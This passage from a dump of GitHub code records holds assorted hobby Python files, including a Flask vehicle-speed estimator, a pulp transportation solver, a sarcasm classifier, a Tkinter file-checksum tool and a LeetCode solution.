== n + 1:\n\n for j in range(0, int(n / 2)):\n print(\" \", end='')\n out += ' '\n\n print(\"*\")\n out += '*\\n'\n ln += 1\n\n # Case 3: Other rows\n else:\n\n diff = abs(mid - ln)\n\n for j in range(0, diff):\n print(\" \", end='')\n out += ' '\n\n for j in range(0, n - (diff * 2)):\n print(\"*\", end='')\n out += '*'\n\n print(\"\")\n out += '\\n'\n ln += 1\n\n return out\n\ndef main():\n print(diamond(9))\n\nif __name__ == '__main__': main()","repo_name":"farhanr8/PyExercises","sub_path":"Codewars/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3524013466","text":"from flask import Flask, render_template, Response\n# from camera1 import Video\nimport cv2\nimport math\nimport time\nimport dlib\n\napp=Flask(__name__)\ncarCascade = cv2.CascadeClassifier('vech.xml')\nWIDTH = 1280\nHEIGHT = 720\ndef estimateSpeed(location1, location2):\n d_pixels = math.sqrt(math.pow(location2[0] - location1[0], 2) + math.pow(location2[1] - location1[1], 2))\n # ppm = location2[2] / carWidht\n ppm = 8.8\n d_meters = d_pixels / ppm\n fps = 18\n speed = d_meters * fps * 3.6\n return speed\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\ndef gen():\n video=cv2.VideoCapture(0)\n rectangleColor = (0, 255, 0)\n frameCounter = 0\n currentCarID = 0\n fps = 0\n\n carTracker = {}\n carNumbers = {}\n carLocation1 = {}\n carLocation2 = {}\n speed = [None] * 1000\n while (video.isOpened()):\n start_time= time.time()\n rc, frame= video.read()\n if type(frame)==type(None):\n break\n image=cv2.resize(frame, (WIDTH, HEIGHT))\n frameCounter = frameCounter + 1\n carIDtoDelete = []\n for carID in carTracker.keys():\n trackingQuality = carTracker[carID].update(image)\n\n if trackingQuality < 7:\n carIDtoDelete.append(carID)\n for carID in carIDtoDelete:\n print(\"Removing carID \" + 
str(carID) + ' from list of trackers. ')\n print(\"Removing carID \" + str(carID) + ' previous location. ')\n print(\"Removing carID \" + str(carID) + ' current location. ')\n carTracker.pop(carID, None)\n carLocation1.pop(carID, None)\n carLocation2.pop(carID, None)\n if not (frameCounter % 10):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n cars = carCascade.detectMultiScale(gray, 1.1, 13, 18, (24, 24)) \n for (_x, _y, _w, _h) in cars:\n x = int(_x)\n y = int(_y)\n w = int(_w)\n h = int(_h)\n\n x_bar = x + 0.5 * w\n y_bar = y + 0.5 * h\n\n matchCarID = None \n for carID in carTracker.keys():\n trackedPosition = carTracker[carID].get_position()\n\n t_x = int(trackedPosition.left())\n t_y = int(trackedPosition.top())\n t_w = int(trackedPosition.width())\n t_h = int(trackedPosition.height())\n\n t_x_bar = t_x + 0.5 * t_w\n t_y_bar = t_y + 0.5 * t_h\n\n if ((t_x <= x_bar <= (t_x + t_w)) and (t_y <= y_bar <= (t_y + t_h)) and (x <= t_x_bar <= (x + w)) and (y <= t_y_bar <= (y + h))):\n matchCarID = carID\n if matchCarID is None:\n print(' Creating new tracker' + str(currentCarID))\n\n tracker = dlib.correlation_tracker()\n tracker.start_track(image, dlib.rectangle(x, y, x + w, y + h))\n\n carTracker[currentCarID] = tracker\n carLocation1[currentCarID] = [x, y, w, h]\n\n currentCarID = currentCarID + 1\n for carID in carTracker.keys():\n trackedPosition = carTracker[carID].get_position()\n\n t_x = int(trackedPosition.left())\n t_y = int(trackedPosition.top())\n t_w = int(trackedPosition.width())\n t_h = int(trackedPosition.height())\n\n cv2.rectangle(image, (t_x, t_y), (t_x + t_w, t_y + t_h), rectangleColor, 4)\n\n carLocation2[carID] = [t_x, t_y, t_w, t_h]\n end_time = time.time()\n if not (end_time == start_time):\n fps = 1.0/(end_time - start_time)\n for i in carLocation1.keys():\n if frameCounter % 1 == 0:\n [x1, y1, w1, h1] = carLocation1[i]\n [x2, y2, w2, h2] = carLocation2[i]\n\n carLocation1[i] = [x2, y2, w2, h2]\n if [x1, y1, w1, h1] != [x2, y2, w2, h2]:\n if (speed[i] == None or speed[i] == 0) and y1 >= 275 and y1 <= 285:\n speed[i] = estimateSpeed([x1, y1, w1, h1], [x1, y2, w2, h2])\n\n if speed[i] != None and y1 >= 180:\n cv2.putText(image, str(int(speed[i])) + \"km/h\", (int(x1 + w1/2), int(y1-5)), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 100) ,2)\n frame= cv2.imencode('.jpg',image)[1].tobytes()\n yield (b'--frame\\r\\n'b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n\n # frame=camera.getframe()\n # yield(b'--frame\\r\\n'\n # b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame +\n # b'\\r\\n\\r\\n')\n\n@app.route('/video')\n\ndef video():\n return Response(gen(),\n mimetype='multipart/x-mixed-replace; boundary=frame')\n\napp.run(debug=True)","repo_name":"ayushkr1701/speeddetectionflask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31414869496","text":"import pulp as pl\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\n# 定义产地、市场、产量和需求\r\nA = ['1', '2', '3']\r\nB = ['1', '2', '3', '4']\r\na = {'1': 500, '2': 600, '3': 250}\r\nb = {'1': 600, '2': 400, '3': 200, '4': 150}\r\n\r\n# 定义运费\r\nf = {'1': {'1': 20, '2': 10, '3': 12, '4': 16},\r\n '2': {'1': 22, '2': 9, '3': 9, '4': 18},\r\n '3': {'1': 23, '2': 13, '3': 10, '4': 25}}\r\n\r\n# 定义线性规划模型\r\nmodel = pl.LpProblem(\"Transportation\", pl.LpMinimize)\r\n\r\n# 定义决策变量\r\nx = pl.LpVariable.dicts(\"Route\", [(i, j) 
for i in A for j in B],\r\n                        lowBound=0, cat='Continuous')\r\n\r\n# 定义目标函数\r\nmodel += pl.lpSum([x[i, j]*f[i][j] for i in A for j in B]), \"Total Cost\"\r\n\r\n# 定义约束条件\r\nfor i in A:\r\n    model += pl.lpSum([x[i, j] for j in B]) == a[i], \"Sum of Products %s\"%i\r\n\r\nfor j in B:\r\n    model += pl.lpSum([x[i, j] for i in A]) == b[j], \"Sum of Demand %s\"%j\r\n\r\n# 求解线性规划问题\r\nmodel.solve()\r\n\r\n# 打印结果\r\nprint(\"Total Cost = \", pl.value(model.objective))\r\nfor i in A:\r\n    for j in B:\r\n        print(\"路线 %s -> %s 量为 %d\" % (i, j, x[i, j].varValue))\r\n\r\n# 构建有向图\r\nG = nx.DiGraph()\r\n\r\n# 添加节点\r\nfor i in A:\r\n    for j in B:\r\n        G.add_node(\"%s -> %s\" % (i, j))\r\n\r\n# 添加边\r\nfor i in A:\r\n    for j in B:\r\n        for k in A:\r\n            for l in B:\r\n                if x[i, j].varValue > 0 and (i, j) != (k, l):\r\n                    if i == k:\r\n                        G.add_edge(\"%s -> %s\" % (i, j), \"%s -> %s\" % (k, l),\r\n                                   weight=f[i][j], label=str(int(x[i, j].varValue)))\r\n                    elif j == l:\r\n                        G.add_edge(\"%s -> %s\" % (i, j), \"%s -> %s\" % (k, l),\r\n                                   weight=f[i][j], label=str(int(x[i, j].varValue)))\r\n\r\n# 绘制有向图\r\npos = nx.spring_layout(G, k=0.5)\r\nlabels = nx.get_edge_attributes(G, 'label')\r\nnx.draw_networkx(G, pos)\r\nnx.draw_networkx_edge_labels(G, pos, edge_labels=labels)\r\nplt.show()\r\n","repo_name":"Lixianlll/Graph-Neural-Networks","sub_path":"Graph-Neural-Networks/networkx搭建图网络.py","file_name":"networkx搭建图网络.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74735747572","text":"from Dataset import Dataset\nimport numpy as np\n\nimg_names = []\nimg_labels = []\nwith open('weather_val_labels.csv') as input_file:\n    for line in input_file:\n        (img_name, label) = line.split(',')\n        img_names.append(img_name)\n        img_labels.append(int(label))\n\nmean_pixel = np.load('train_mean_pixel.npy')\nstd_pixel = np.load('train_std_pixel.npy')\ndset = Dataset(img_names, img_labels, batch_size=8, shuffle=True, \n               mean_pixel=mean_pixel, std_pixel=std_pixel)\ni = 0\nfor x, y in dset:\n    print(x[0,0,0,0])\n    print(x.shape)\n    print(y.shape)\n    print()\n    i += 1\n    if i >= 1000:\n        break\n","repo_name":"BrettMeehan/CS231N_Final_Project","sub_path":"testDataset.py","file_name":"testDataset.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3487641881","text":"#\n# @lc app=leetcode.cn id=108 lang=python3\n#\n# [108] 将有序数组转换为二叉搜索树\n#\n# https://leetcode-cn.com/problems/convert-sorted-array-to-binary-search-tree/description/\n#\n# algorithms\n# Easy (63.90%)\n# Likes:    188\n# Dislikes: 0\n# Total Accepted:    20.7K\n# Total Submissions: 32.3K\n# Testcase Example:  '[-10,-3,0,5,9]'\n#\n# 将一个按照升序排列的有序数组,转换为一棵高度平衡二叉搜索树。\n#\n# 本题中,一个高度平衡二叉树是指一个二叉树每个节点 的左右两个子树的高度差的绝对值不超过 1。\n#\n# 示例:\n#\n# 给定有序数组: [-10,-3,0,5,9],\n#\n# 一个可能的答案是:[0,-3,9,-10,null,5],它可以表示下面这个高度平衡二叉搜索树:\n#\n# ⁠ 0\n# ⁠ / \\\n# ⁠ -3 9\n# ⁠ / /\n# ⁠-10 5\n#\n#\n#\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\n\nclass Solution:\n    def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n        if not nums:\n            return None\n\n        mid = len(nums) // 2\n        root = TreeNode(nums[mid])\n        left = nums[:mid]\n        right = nums[mid + 1 :]\n        root.left = self.sortedArrayToBST(left)\n        root.right = self.sortedArrayToBST(right)\n\n        return 
root\n\n","repo_name":"Ehco1996/leetcode","sub_path":"backup/python/easy/108.将有序数组转换为二叉搜索树.py","file_name":"108.将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"12027186761","text":"import numpy\r\nimport scipy\r\nimport re\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport gensim\r\nimport keras\r\nfrom keras.models import Sequential, Model, load_model\r\nfrom keras.layers import Input,Concatenate\r\nfrom keras.layers import Reshape,Dense, Dropout, Embedding, LSTM,Flatten,Conv2D,MaxPooling2D\r\nfrom keras.optimizers import Adam\r\nimport csv\r\n\r\nTRAINING=1\r\nembedding_model=gensim.models.KeyedVectors.load_word2vec_format('E:/wordembedding/GoogleNews-vectors-negative300.bin', binary=True)\r\nesize=300\r\nsent_len=540\r\nbbatch=128\r\nmeta_batch=256\r\nmax_rounds=0\r\npretrain_rounds=2\r\n\r\ndef read_embedding(words,sent_len):\r\n X=[numpy.resize(numpy.array([embedding_model[word] for word in sent if word in embedding_model]),[sent_len,esize]) for sent in words]\r\n return X\r\n\r\ndef clean_up(s):\r\n global sent_len\r\n if(len(s[0])==2):\r\n y_=[[1-x[0],int(x[0])] for x in s]\r\n x_=[re.findall(r'[\\w]+',x[1]) for x in s]\r\n return numpy.array(read_embedding(x_,sent_len)).reshape((len(s),sent_len,esize,1)),y_\r\n else:\r\n y_=[[1-x[0],int(x[0])] for x in s]\r\n x_1=[re.findall(r'[\\w]+',x[1]) for x in s]\r\n x_2=[re.findall(r'[\\w]+',x[2]) for x in s]\r\n return (numpy.array(read_embedding(x_1,sent_len)).reshape((len(s),sent_len,esize,1)),\r\n numpy.array(read_embedding(x_2,sent_len)).reshape((len(s),sent_len,esize,1)),\r\n y_)\r\n\r\n\r\n\r\n\r\nif(TRAINING):\r\n model_input=Input(shape=(sent_len,esize,1),dtype='float32')\r\n add_input=Input(shape=(sent_len,esize,1),dtype='float32')\r\n conv_layer_1=Conv2D(256,(3,esize),activation='relu')\r\n conv_layer_2=Conv2D(256,(3,256),activation='relu')\r\n lstm_1=LSTM(256,activation='sigmoid',return_sequences=True)\r\n lstm_2=LSTM(256,activation='sigmoid')\r\n dropout=Dropout(0.5)\r\n dense_1=Dense(256,activation='sigmoid')\r\n left=conv_layer_1(model_input)\r\n left=Reshape((sent_len-2,256,1))(left)\r\n left=conv_layer_2(left)\r\n left=Reshape((sent_len-4,256))(left)\r\n left=lstm_1(left)\r\n left=lstm_2(left)\r\n left=dropout(left)\r\n left=dense_1(left)\r\n pretrain_out=Dense(2,activation='softmax')(left)\r\n\r\n right=conv_layer_1(add_input)\r\n right=Reshape((sent_len-2,256,1))(right)\r\n right=conv_layer_2(right)\r\n right=Reshape((sent_len-4,256))(right)\r\n right=lstm_1(right)\r\n right=lstm_2(right)\r\n right=dropout(right)\r\n right=dense_1(right)\r\n right=keras.layers.concatenate([left,right])\r\n real_out=Dense(2,activation='softmax')(right)\r\n\r\n if(os.path.exists('pretrain-deep-pre.h5')==False):\r\n model=Model(inputs=model_input,outputs=pretrain_out)\r\n model.compile(optimizer='rmsprop',loss='categorical_crossentropy')\r\n #dense_layer=Dense(256,activation='relu')\r\n \r\n\r\n #pre-train\r\n plt.ion()\r\n trds=0\r\n lloss=0.7\r\n disloss=0.7\r\n fsent=open('Sentiment.csv','r',encoding='utf-8')\r\n sentreader=csv.reader(fsent,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n ins=[]\r\n next(sentreader)\r\n for epoch in range(pretrain_rounds):\r\n for row in sentreader:\r\n ins.append([int(row[1]),row[3]])\r\n if(len(ins)>meta_batch):\r\n #print(\"pretending pretraining\")\r\n ins=clean_up(ins)\r\n history=model.fit(ins[0],ins[1],epochs=1,verbose=2,batch_size=bbatch,validation_split=0)\r\n 
disloss+=history.history['loss'][0]\r\n                    if(trds%20==19):\r\n                        disloss/=20\r\n                        plt.plot([trds//20,trds//20+1],[lloss,disloss],'b')\r\n                        lloss=disloss\r\n                        disloss=0\r\n                        plt.pause(0.05)\r\n                    trds+=1\r\n                    ins=[]\r\n            fsent.seek(0)\r\n            next(sentreader)\r\n        plt.show()\r\n        model.save('pretrain-deep-pre.h5')\r\n    else:\r\n        #train\r\n        model=load_model('pretrain-deep-pre.h5')\r\n        model=Model(inputs=[model_input,add_input],outputs=real_out)\r\n        model.compile(optimizer='adam',loss='categorical_crossentropy')\r\n\r\n        ins=[]\r\n        test_x=[]\r\n        test_y=[]\r\n        ftrue=open(\"true_context.csv\",'r')\r\n        ffalse=open(\"false_context.csv\",'r')\r\n        treader=csv.reader(ftrue,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n        freader=csv.reader(ffalse,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n\r\n        ins=[]\r\n        trials=0\r\n        next(treader)\r\n        next(freader)\r\n        for i in range(bbatch//2):\r\n            test_x.append(next(treader))\r\n            test_x.append(next(freader))\r\n            test_y.append(True)\r\n            test_y.append(False)\r\n\r\n        tests=[[test_y[i],test_x[i][0],test_x[i][1]] for i in range(len(test_x))]\r\n        tests=clean_up(tests)\r\n\r\n        tests_x_1=numpy.array(tests[0]).reshape([bbatch,sent_len,esize,1])\r\n        tests_x_2=numpy.array(tests[1]).reshape([bbatch,sent_len,esize,1])\r\n        tests_y=numpy.array(tests[2])\r\n        trds=0\r\n        lloss=0.7\r\n        lacc=0.5\r\n        lvacc=0.5\r\n        lvloss=0.7\r\n        for epoch in range(max_rounds):\r\n            while(True):\r\n                try:\r\n                    trues=next(treader)\r\n                    falses=next(freader)\r\n                except:\r\n                    break\r\n                ins.append([True,trues[0],trues[1]])\r\n                ins.append([False,falses[0],falses[1]])\r\n                if(len(ins)>=meta_batch):\r\n                    ins=clean_up(ins)\r\n                    #print(\"pretending training\")\r\n                    history=model.fit([ins[0],ins[1]],ins[2],epochs=1,verbose=2,batch_size=bbatch,validation_split=0)\r\n                    plt.plot([trds,trds+1],[lloss,history.history['loss'][0]],'r')\r\n                    lloss=history.history['loss'][0]\r\n                    plt.pause(0.05)\r\n                    ins=[]\r\n                    trds+=1\r\n            ftrue.seek(0)\r\n            ffalse.seek(0)\r\n            next(treader)\r\n            next(freader)\r\n            for i in range(bbatch//2):\r\n                next(treader)\r\n                next(freader)\r\n        plt.show()\r\n        plt.savefig('pretrain-deep.jpg')\r\n        model.save('pretrain-deep.h5')\r\nelse:\r\n    total=0\r\n    correct=0\r\n    model=load_model('pretrain-deep.h5')\r\n    ftest=open(\"test_context.csv\",'r')\r\n    treader=csv.reader(ftest,delimiter=',',quotechar='|',quoting=csv.QUOTE_MINIMAL)\r\n    while(True):\r\n        try:\r\n            row=next(treader)\r\n        except:\r\n            break\r\n        ins=clean_up([[int(row[2]),row[0],row[1]]])\r\n        ans=model.predict([ins[0],ins[1]])\r\n        correct+=int(numpy.argmax(ans,axis=1)[0]==int(row[2]))\r\n        total+=1\r\n\r\n    #raise Exception\r\n\r\n    print(float(correct)/float(total))\r\n    #raise Exception\r\n","repo_name":"RikonYu/sarcasm","sub_path":"pretrain2.py","file_name":"pretrain2.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43295388991","text":"from __future__ import (absolute_import, division, print_function,\n    unicode_literals)\n\nimport numpy as np\nfrom skimage.io import imsave\n\n__all__ = ['glue_focus', 'save_scaled_image']\n\n\ndef glue_focus(xyz, labels):\n    \"\"\"\n    Launch a glue session with focusing results.\n\n    Parameters\n    ----------\n    xyz : `~numpy.ndarray`\n        Matrix of (x, y, z) positions of particles\n    labels : `~numpy.ndarray`\n        Labels for particles assigned by clustering algorithm\n\n    Returns\n    -------\n    ga : `~glue.app.qt.application.GlueApplication`\n        Glue qt GUI application session\n    \"\"\"\n    from glue.core import DataCollection, Data\n    from 
glue.app.qt.application import GlueApplication\n from glue_vispy_viewers.scatter.scatter_viewer import VispyScatterViewer\n\n data = Data(x=xyz[:, 0], y=xyz[:, 1], z=xyz[:, 2],\n clusters=labels, label='data')\n dc = DataCollection([data])\n\n # create a GUI session\n ga = GlueApplication(dc)\n scatter = ga.new_data_viewer(VispyScatterViewer)\n scatter.add_data(data)\n\n return ga\n\n\ndef save_scaled_image(image, filename, margin=100, blobs=None,\n min=0.01, max=99.99): #, min=0.05, max=99.95):\n \"\"\"\n Save an image to png.\n\n Parameters\n ----------\n image : `~numpy.ndarray`\n Image to save\n filename : str\n Path to where to save the png file\n blobs : list or `~numpy.ndarray` or `None`\n (x, y, z) positions\n margin : \n min : float\n Colormap scaling minimum\n max : float\n Colormap scaling maximum\n \"\"\"\n img_scaled = image.copy()\n\n if img_scaled.shape[0] > 1000:\n scale_margin = 200\n elif img_scaled.shape[0] > 500:\n scale_margin = 50\n elif img_scaled.shape[0] < 100:\n scale_margin = 0\n else:\n scale_margin = 10\n\n if img_scaled.shape[0] > 100:\n center_stamp = image[scale_margin:-scale_margin]\n img_scaled[np.percentile(center_stamp, min) > image] = np.percentile(center_stamp, min)\n img_scaled[np.percentile(center_stamp, max) < image] = np.percentile(center_stamp, max)\n\n img_scaled = ((img_scaled - img_scaled.min()) /\n (img_scaled.max()-img_scaled.min()))\n\n if blobs is not None:\n for blob in blobs:\n x, y = blob[0] + margin, blob[1] + margin\n lo = 10\n hi = 20\n thick = 2.0\n img_scaled[x+lo:x+hi, y-thick:y+thick] = 1.0\n img_scaled[x-thick:x+thick, y+lo:y+hi] = 1.0\n img_scaled[x-hi:x-lo, y-thick:y+thick] = 1.0\n img_scaled[x-thick:x+thick, y-hi:y-lo] = 1.0\n\n imsave(filename, img_scaled)\n\n","repo_name":"bmorris3/shampoo","sub_path":"shampoo/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"19424237531","text":"\r\nimport binascii\r\nimport tkinter as tk\r\nimport tkinter.filedialog\r\nimport hashlib\r\nfrom blake3 import blake3\r\nfrom tkinter import scrolledtext \r\n# import subprocess\r\n\r\nb2sum = \"\"\r\nfile = ''\r\ncodes = {}\r\ndef onFinish():\r\n pass\r\n\r\ndef findfile():\r\n global file\r\n file = tkinter.filedialog.askopenfilename()\r\n if file != '':\r\n b2.config(text = \"File in:\"+ file)\r\n start()\r\n else:\r\n b2.config(text = \"Please select a file\")\r\n \r\n# def blake2(alg):\r\n# global codes\r\n \r\n# alg = \"blake2\"+alg\r\n# cwd = os.getcwd()\r\n# tool = os.path.abspath(cwd + '/bin/b2sum-i686-windows.exe')\r\n\r\n# cmd = '\"'+ tool +'\"' + \" \"+\"-a \"+alg+\" \"+ '\"'+ os.path.abspath(file) + '\"'\r\n# if alg == \"blake23\":\r\n# alg = \"blake3\"\r\n# cmd = '\"'+os.path.abspath(cwd + '/bin/b3sum_windows_x64_bin.exe')+'\"' + ' ' + '\"'+ os.path.abspath(file) + '\"'\r\n\r\n\r\n# code = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE).stdout.readlines()\r\n# print(cmd)\r\n\r\n# try:\r\n# if code != []:\r\n# code = code[0].decode(\"utf-8\").split(\" \")[0]\r\n# except:\r\n# if code != []:\r\n# code = code[0].decode(\"gbk\").split(\" \")[0]\r\n# if code != []:\r\n# codes[alg] = code\r\n# else:\r\n# codes[alg] = \"error\" \r\n\r\ndef calHashForBigFile(a):\r\n global file\r\n if a == \"md5\":\r\n m = hashlib.md5()\r\n elif a == \"sha1\":\r\n m = hashlib.sha1()\r\n elif a == 'sha224':\r\n m = hashlib.sha224()\r\n elif a == 'sha256':\r\n m = hashlib.sha256()\r\n elif a == 'sha384':\r\n m = 
hashlib.sha384()\r\n    elif a == 'hmac':\r\n        m = hashlib.sha384()  # note: the 'hmac' option currently falls back to sha384 (hashlib's hmac needs a key)\r\n    elif a == 'blake2b':\r\n        m = hashlib.blake2b()\r\n    elif a == 'blake2s':\r\n        m = hashlib.blake2s()\r\n    elif a == 'blake3':\r\n        m = blake3()\r\n    f = open(file, 'rb')\r\n    buffer = 8192  # 8192-byte chunks read noticeably faster than 2048 here\r\n    while 1:\r\n        chunk = f.read(buffer)\r\n        if not chunk : break\r\n        m.update(chunk) \r\n    f.close()\r\n    return m.hexdigest()\r\ndef calcFileCRC(): \r\n    global file\r\n    try: \r\n        blocksize = 1024 * 64 \r\n        f = open(file,\"rb\") \r\n        str = f.read(blocksize) \r\n        crc = 0 \r\n        while(len(str) != 0): \r\n            crc = binascii.crc32(str, crc) \r\n            str = f.read(blocksize) \r\n        f.close() \r\n    except: \r\n        print('get file crc error!') \r\n        return \"error\"\r\n    return hex(crc)\r\ndef start():\r\n    global codes\r\n    codes = {}\r\n    if blake2b.get() == 1:\r\n        codes['blake2b'] = calHashForBigFile(\"blake2b\")\r\n    if blake2s.get() == 1:\r\n        codes['blake2s'] = calHashForBigFile(\"blake2s\")\r\n    if blake2bp.get() == 1:\r\n        codes['blake2bp'] = \"unsupported\"\r\n    if blake2sp.get() == 1:\r\n        # blake2(\"sp\")\r\n        codes['blake2sp'] = \"unsupported\"\r\n    if md5.get() == 1:\r\n        codes['md5'] = calHashForBigFile('md5')\r\n    if blake3i.get() == 1:\r\n        codes['blake3'] = calHashForBigFile(\"blake3\")\r\n    if crc32.get() == 1:\r\n        codes['crc32'] = calcFileCRC()\r\n    if hmac.get() == 1:\r\n        codes['hmac'] = calHashForBigFile('hmac')\r\n    if sha1.get() == 1:\r\n        codes['sha1'] = calHashForBigFile('sha1')\r\n    if sha224.get() == 1:\r\n        codes['sha224'] = calHashForBigFile('sha224')\r\n    if sha256.get() == 1:\r\n        codes['sha256'] = calHashForBigFile('sha256')\r\n    if sha384.get() == 1:\r\n        codes['sha384'] = calHashForBigFile('sha384')\r\n    text = \"\"\r\n    for k in codes.keys():\r\n        text = text +\"[ \" +k.upper()+\"\\t]\" + \"\\t\" + codes[k] + '\\n'\r\n    b4.delete(1.0, tk.END)\r\n    max_height = len(codes.keys()) + 3\r\n    maxchar = max(len(l) for l in text.split('\\n'))\r\n    max_width = max(60, min(144, maxchar - 20))\r\n    b4.configure(width= max_width)\r\n    b4.configure(height= max_height)\r\n    b4.insert(tk.END,text)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    \r\n    root = tk.Tk()\r\n    root.title(\"File Checksum toolkit\")\r\n    # root.iconbitmap(\"icon.ico\")\r\n    b1 = tk.Label(root, text = '1.Choose system')\r\n    b1.pack()\r\n    sys_code = tk.IntVar()\r\n    \r\n    windows64_select = tk.Radiobutton(root, text='Windows amd64',value=1,variable=sys_code)\r\n    windows86_select = tk.Radiobutton(root, text='Windows x86',value=2,variable=sys_code)\r\n    windows64_select.pack()\r\n    windows86_select.pack()\r\n    b3 = tk.Label(root, text = '2.Choose Algorithm')\r\n    b3.pack()\r\n    frame1 = tk.Frame(root)\r\n    frame2 = tk.Frame(root)\r\n    frame3 = tk.Frame(root)\r\n    blake2b = tk.IntVar()\r\n    blake2s = tk.IntVar()\r\n    blake2bp = tk.IntVar()\r\n    blake2sp = tk.IntVar()\r\n    C1 = tk.Checkbutton(frame1, text = \"blake2b\", variable = blake2b, onvalue = 1, offvalue = 0)\r\n    C2 = tk.Checkbutton(frame1, text = \"blake2s\", variable = blake2s, onvalue = 1, offvalue = 0)\r\n    C3 = tk.Checkbutton(frame1, text = \"blake2bp\", variable = blake2bp, onvalue = 1, offvalue = 0)\r\n    C4 = tk.Checkbutton(frame1, text = \"blake2sp\", variable = blake2sp, onvalue = 1, offvalue = 0)\r\n\r\n    md5 = tk.IntVar()\r\n    blake3i = tk.IntVar()\r\n    crc32 = tk.IntVar()\r\n    hmac = tk.IntVar()\r\n    C5 = tk.Checkbutton(frame2, text = \"md5\", variable = md5, onvalue = 1, offvalue = 0)\r\n    C6 = tk.Checkbutton(frame2, text = \"blake3\", variable = blake3i, onvalue = 1, offvalue = 0)\r\n    C7 = tk.Checkbutton(frame2, text = \"crc32\", variable = 
crc32, onvalue = 1, offvalue = 0)\r\n C8 = tk.Checkbutton(frame2, text = \"hmac\", variable = hmac, onvalue = 1, offvalue = 0)\r\n\r\n sha1 = tk.IntVar()\r\n sha224 = tk.IntVar()\r\n sha256 = tk.IntVar()\r\n sha384 = tk.IntVar()\r\n C9 = tk.Checkbutton(frame3, text = \"sha1\", variable = sha1, onvalue = 1, offvalue = 0)\r\n C10 = tk.Checkbutton(frame3, text = \"sha224\", variable = sha224, onvalue = 1, offvalue = 0)\r\n C11 = tk.Checkbutton(frame3, text = \"sha256\", variable = sha256, onvalue = 1, offvalue = 0)\r\n C12 = tk.Checkbutton(frame3, text = \"sha384\", variable = sha384, onvalue = 1, offvalue = 0)\r\n \r\n C1.pack(side=tk.LEFT)\r\n C2.pack(side=tk.LEFT)\r\n C3.pack(side=tk.LEFT)\r\n C4.pack(side=tk.LEFT)\r\n C5.pack(side=tk.LEFT)\r\n C6.pack(side=tk.LEFT)\r\n C7.pack(side=tk.LEFT)\r\n C8.pack(side=tk.LEFT)\r\n C9.pack(side=tk.LEFT)\r\n C10.pack(side=tk.LEFT)\r\n C11.pack(side=tk.LEFT)\r\n C12.pack(side=tk.LEFT)\r\n\r\n frame1.pack(side=tk.TOP)\r\n frame2.pack(side=tk.TOP)\r\n frame3.pack(side=tk.TOP)\r\n\r\n\r\n\r\n file_btn = tk.Button(root,text=\"3.Choose File And Calculate Checksum\",command=findfile)\r\n file_btn.pack()\r\n\r\n b2 = tk.Label(root, text = '')\r\n b2.pack()\r\n ptext = tk.StringVar()\r\n # check_btn = tk.Button(root,text=\"4.Calculate Checksum\",command=start)\r\n # check_btn.pack()\r\n b4 = scrolledtext.ScrolledText(root, bd=5 ,width = 60, height = 1, wrap=tk.WORD)\r\n b4.pack()\r\n \r\n onFinish()\r\n root.mainloop()","repo_name":"EthanBird/FileChecksumTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42007997952","text":"# [[file:02_QtDesigner.org::*Direkte indlæsning af designfil][Direkte indlæsning af designfil:1]]\n# Grafisk_trekantsberegner.py\nimport sys\n\nfrom PySide6.QtWidgets import QApplication\n# QUiLoader skal bruges til at loade ui-filen\nfrom PySide6.QtUiTools import QUiLoader\n\n# Læg mærke tile at QMainWindow ikke importeres.\n# I stedet importeres QObject i stedet for.\n# QMainWindow er anvendt i Designer.\nfrom PySide6.QtCore import QObject\n\n\n# loader-objekt som bruges til at loade .ui-filen\nloader = QUiLoader()\n\n\nclass Trekantsberegner(QObject):\n def __init__(self):\n super().__init__()\n # Brugerfladen kan tilgås gennem self.ui\n self.ui = loader.load(\"Grafisk_trekantsberegner_GUI.ui\", None)\n self.ui.beregnknap.clicked.connect(self.beregn)\n # Skal bruges til at gemme værdierne for vinklerne og sidelængderne\n self.trekantsvaerdier = {}\n\n def beregn(self):\n # Her er et eksempel, som skal vise, hvordan værdier kan gemmes\n # I skal bruge funktionen beregn til noget andet end dette eksempel\n # Gemmer alle vinkler og længder i et dictionary\n for noegle, stoerrelse in zip([\"A\", \"B\", \"C\", \"a\", \"b\", \"c\"],[self.ui.vinkel_A, self.ui.vinkel_B, self.ui.vinkel_C, self.ui.side_a, self.ui.side_b, self.ui.side_c]):\n self.trekantsvaerdier[noegle] = stoerrelse.value()\n\n # Alternativ til for-løkken. 
